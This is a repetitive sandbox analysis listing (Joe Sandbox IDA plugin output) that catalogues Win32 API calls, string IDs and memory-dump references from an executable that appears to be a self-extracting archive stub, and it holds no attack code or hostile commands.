                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                      • String ID: \
                                                                      • API String ID: 3569833718-2967466578
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007DD7AE
                                                                      • ShellExecuteExW.SHELL32(?), ref: 007DD8DE
                                                                      • ShowWindow.USER32(?,00000000), ref: 007DD91D
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 007DD959
                                                                      • CloseHandle.KERNEL32(?), ref: 007DD97F
                                                                      • ShowWindow.USER32(?,00000001), ref: 007DD9E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                      • String ID: .exe$.inf$PDGu<}$h}$r}
                                                                      • API String ID: 36480843-3163435001
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,007E3C35,00000000,00000FA0,00822088,00000000,?,007E3D60,00000004,InitializeCriticalSectionEx,007F6394,InitializeCriticalSectionEx,00000000), ref: 007E3C03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$c*~
                                                                      • API String ID: 3664257935-2109102344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007E57FB,007E57FB,?,?,?,007EABAC,00000001,00000001,2DE85006), ref: 007EA9B5
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007EABAC,00000001,00000001,2DE85006,?,?,?), ref: 007EAA3B
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007EAB35
                                                                      • __freea.LIBCMT ref: 007EAB42
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • __freea.LIBCMT ref: 007EAB4B
                                                                      • __freea.LIBCMT ref: 007EAB70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 007DABC2
                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 007DABF9
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007DABE9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                      • String ID: @Ut$EDIT
                                                                      • API String ID: 4243998846-2065656831
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%


                                                                      APIs
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • OleInitialize.OLE32(00000000), ref: 007DAC2F
                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007DAC66
                                                                      • SHGetMalloc.SHELL32(00808438), ref: 007DAC70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                      • String ID: riched20.dll$3So
                                                                      • API String ID: 3498096277-3464455743
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,007C7760,?,00000005,?,00000011), ref: 007C995F
                                                                      • GetLastError.KERNEL32(?,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C996C
                                                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,007C7760,?,00000005,?), ref: 007C99A2
                                                                      • GetLastError.KERNEL32(?,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C99AA
                                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C99F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast$Time
                                                                      • String ID:
                                                                      • API String ID: 1999340476-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                      • IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                      • TranslateMessage.USER32(?), ref: 007DB5AC
                                                                      • DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 1266772231-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Graph not reproduced; function starting at 7ddbde]
                                                                      APIs
                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007DDBF4
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007DDC30
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID: sfxcmd$sfxpar
                                                                      • API String ID: 1431749950-3493335439
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Graph not reproduced; function starting at 7c9785]
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 007C9795
                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C97AD
                                                                      • GetLastError.KERNEL32 ref: 007C97DF
                                                                      • GetLastError.KERNEL32 ref: 007C97FE
                                                                      Similarity
                                                                      • API ID: ErrorLast$FileHandleRead
                                                                      • String ID:
                                                                      • API String ID: 2244327787-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,007E40EF,00000000,00000000,?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue), ref: 007EAD66
                                                                      • GetLastError.KERNEL32(?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue,007F7970,FlsSetValue,00000000,00000364,?,007E98B7), ref: 007EAD72
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue,007F7970,FlsSetValue,00000000), ref: 007EAD80
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 007D1043
                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 007D108A
                                                                        • Part of subcall function 007C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C6C54
                                                                        • Part of subcall function 007C6DCB: _wcschr.LIBVCRUNTIME ref: 007C6E0A
                                                                        • Part of subcall function 007C6DCB: _wcschr.LIBVCRUNTIME ref: 007C6E19
                                                                      Similarity
                                                                      • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                      • String ID: CreateThread failed
                                                                      • API String ID: 2706921342-3849766595
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: 2}$PDGu<}
                                                                      • API String ID: 1269201914-2906391703
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: (}$PDGu<}
                                                                      • API String ID: 1269201914-2387732174
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,007CD343,00000001,?,?,?,00000000,007D551D,?,?,?), ref: 007C9F9E
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,007D551D,?,?,?,?,?,007D4FC7,?), ref: 007C9FE5
                                                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,007CD343,00000001,?,?), ref: 007CA011
                                                                      Similarity
                                                                      • API ID: FileWrite$Handle
                                                                      • String ID:
                                                                      • API String ID: 4209713984-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007CC27E: _wcslen.LIBCMT ref: 007CC284
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA2D9
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA30C
                                                                      • GetLastError.KERNEL32(?,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA329
                                                                      Similarity
                                                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2260680371-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007EB8B8
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 007EAFDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: String
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 2568140703-3893581201
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007EA56F), ref: 007EAF55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                      • String ID: InitializeCriticalSectionEx
                                                                      • API String ID: 2593887523-3084827643
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2773662609-671089009
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DEAF9
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: 3So
                                                                      • API String ID: 1269201914-1105799393
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 4658147bdc5583403792a0f8aef6b6e77f3052fec5617409eaaea822e139a614
                                                                      • Instruction ID: db181273a320cec1d85926d26a09009520a957bc55e00e2189e31fb4028dfebe
                                                                      • Opcode Fuzzy Hash: 4658147bdc5583403792a0f8aef6b6e77f3052fec5617409eaaea822e139a614
                                                                      • Instruction Fuzzy Hash: 4CB012D1358048EC310771452D07C37012CD0C0B20330443FF905C93C0D84C6C541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
